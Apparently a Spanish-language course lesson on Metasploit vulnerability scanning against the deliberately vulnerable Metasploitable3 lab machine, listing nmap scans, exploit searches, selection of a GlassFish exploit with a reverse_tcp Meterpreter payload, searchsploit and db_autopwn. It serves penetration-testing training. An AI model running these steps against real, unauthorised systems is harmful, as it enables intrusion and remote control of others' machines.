MSF
Vulnerability Scanning With MSF
El escaneo y detección de vulnerabilidades es el proceso de escanear un objetivo en busca de vulnerabilidades y verificar si pueden explotarse.
Hasta ahora, hemos podido identificar y explotar configuraciones erróneas en los sistemas de destino; sin embargo, en esta sección exploraremos el proceso de utilización de módulos auxiliares y de explotación para escanear e identificar vulnerabilidades inherentes en servicios, sistemas operativos y aplicaciones web.
Esta información será útil durante la fase de explotación de este curso.
También exploraremos el proceso de utilización de herramientas de escaneo de vulnerabilidades de terceros como Nessus y cómo podemos integrar la funcionalidad de Nessus en MSF.
Lab Environment
Para demostrar el proceso de escaneo de vulnerabilidades, utilizaremos una máquina virtual intencionalmente vulnerable llamada Metasploitable3 que se basa en Windows Server 2008.
Metasploitable3 fue desarrollado por Rapid7 para demostrar cómo se puede utilizar MSF para realizar la explotación de un sistema Windows.
Las instrucciones sobre cómo se puede configurar esta máquina virtual se pueden encontrar aquí: https://bit.ly/3kASwns
Demo: Vulnerability Scanning With MSF
# Reconocimiento de red
sudo nmap -sn x.x.x.x/24
# Inicializamos los servicios de metasploit
service postgresql start
[ 0k ] Starting PostgreSQL 11 database server: main.
msfconsole
db_status
# Configuramos el espacio de trabajo [Workspace]
msf5 > workspace -a MS3
[ * ] Added workspace:
Workspace: MS3
# Configurar la IP de la victima/hacker en la variable general
msf5 > setg RHOSTS 192.140.160.3
RHOSTS 192.140.160.3
msf5 > setg RHOST 192.140.160.3
RHOST 192.140.160.3
# Realizamos un scaneo
db_nmap -sS -sV -O <Target>
######################### Resultados del Escaneo #############################
# Informacion de los Host escaneados
msf6 > hosts
# Servicios listados basados en el host segun el escaneo realizado
msf6 > services
##############################################################################
# Buscar una vulnerabilidad basado en la version
msf6 > search type:exploit name:Microsoft IIS <Version>
# En caso de que solo tengamos un modulo, ver si funciona el exploit en la version
# que queremos
msf6 > search Sun GlassFish
# Usamos el modulo y nos pedira configurar un payload
msf6 > use exploit/multi/http/glassfish_deployer
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
# Tambien puede ver informacion del payload donde nos indicara en que
# versiones o como funciona el exploit
msf6 exploit(multi/http/gtassfish_deployer) > info
# Configuracion del payload
msf6 exploit(multi/http/gtassfish_deployer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/gtassfish_deployer) > show options
# Tambien podemos buscar exploits que esten fuera y dentro del modulo del MSF
# utilizando una terminal
kaliakali:-$ searchsploit "Microsoft windows SMB"
# Solo filtraremos modulos que esten dentro del modulo de MSF
kaliakali:-$ searchsploit "Microsoft windows SMB" | grep -e "Metasploit"
# Identificado el exploit el mismo se utilizara y buscara en metasploit
# por lo caul se debera de utilizar con el comando use y buscar con searchTambien podemos utilizar el proceso del DB AUTOCOMPLEMTO PLUGIN, en el siguiente enlase le indicara una breve descripcion del complemento de Metasploit para una facil explotacion y vulnerabilidad de ataque. Lo que significa es que se utiliza esencialmente para identificar módulos de explotación para los puertos que están actualmente abiertos en un sistema de destino.
msf6 > db_autopwn -p -t -PI 445Tambien se puede utilizar el comando Analyze, el cual analizara el contenido de la base de datos de metasploit, entonces sus hosts y servicios y luego le proporcionara una lista de vulnerabilidades
msf6 > analyze
msf6 > vulnsQuiz: Vulnerability Scanning With MSF

Last updated